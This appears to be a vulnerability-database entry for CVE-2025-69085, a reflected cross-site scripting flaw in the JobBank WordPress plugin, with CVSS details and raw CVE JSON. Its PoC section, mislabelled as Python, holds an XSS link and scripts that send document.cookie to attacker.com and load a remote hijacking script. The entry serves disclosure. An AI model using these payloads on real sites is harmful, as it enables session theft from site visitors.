Security Vulnerability Report
中文
CVE-2025-69085 CVSS 7.1 HIGH

CVE-2025-69085

Published: 2026-01-06 17:15:45
Last Modified: 2026-04-23 15:36:20

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in e-plugins JobBank jobbank allows Reflected XSS.This issue affects JobBank: from n/a through <= 1.2.2.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

JobBank <= 1.2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-69085 PoC - JobBank Reflected XSS --> <!-- 攻击者构造恶意URL,受害者访问后执行XSS payload --> <!-- 恶意链接示例 --> https://target-site.com/?s=<script>alert(document.cookie)</script> <!-- 实际利用代码 --> <html> <head><title>JobBank XSS PoC</title></head> <body> <h2>CVE-2025-69085 - JobBank Reflected XSS PoC</h2> <p>Click the link below to test the vulnerability:</p> <a href="http://target-site.com/?s=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E" target="_blank">Trigger XSS</a> <!-- Cookie窃取payload --> <script> // 窃取用户Cookie var cookie = document.cookie; var attacker_server = "http://attacker.com/steal?c=" + encodeURIComponent(cookie); new Image().src = attacker_server; </script> <!-- 会话劫持payload --> <script src="http://attacker.com/xss.js"></script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69085", "sourceIdentifier": "[email protected]", "published": "2026-01-06T17:15:45.413", "lastModified": "2026-04-23T15:36:19.970", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in e-plugins JobBank jobbank allows Reflected XSS.This issue affects JobBank: from n/a through <= 1.2.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/jobbank/vulnerability/wordpress-jobbank-plugin-1-2-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}